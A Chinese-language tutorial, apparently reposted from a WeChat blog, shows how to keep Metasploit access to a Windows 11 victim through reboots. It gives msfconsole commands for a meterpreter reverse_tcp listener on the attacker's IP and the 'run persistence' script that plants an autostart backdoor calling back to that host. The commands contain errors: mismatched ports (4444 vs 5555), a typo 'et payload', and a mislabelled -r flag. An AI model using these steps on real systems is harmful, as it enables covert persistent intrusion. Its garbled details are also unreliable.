我们在利用msfconsole获取系统权限后。若系统进行了关机或者重启,我们与目标建立联系就显得很困难。于是我们需要想办法达到“持久化”效果。本文简单的介绍msf自带脚本与目标达到持久化效果。
实验环境
-
kali Linux(攻击者) -
Win11 (受害者)
获取系统Shell
我们利用msf先通过攻击获取一个 meterpreter shell
。
msfpc windows
配置监听
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.50.84
set LPORT 443
run -j
配置完成后,运行目标程序。如下成功得到shell
持久化
1.获得 meterpreter shell 之后,输入
run persistence -A -S -U -i 5 -p 5555 -r 192.168.50.84
命令语法:
-
-A:自动启动Payload程序
-
-S:系统登录时自动加载
-
-U:用户登录时自动启动
-
-X:开机时自动加载
-
-i:回连的时间间隔
-
-P:监听反向连接端口号
-
-r:目标机器 IP 地址(攻击主机)
执行结束后,可以获得persistence后门,同时会创建一个新的会话,然后将攻击主机(kali)重启。kali输入
use exploit/multi/handler
et payload windows/meterpreter/reverse_tcp
set LHOST 192.168.50.84
set LPORT 4444(端口要和上面的persistence后门端口一致)
run
这样,即使重新启动计算机,此时使用计算机将允许自动重新与目标系统建立连接, 不必每次都需要进行配置才能取得shell。
原文始发于微信公众号(kali笔记):浅谈Msfconsole持久话(一)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论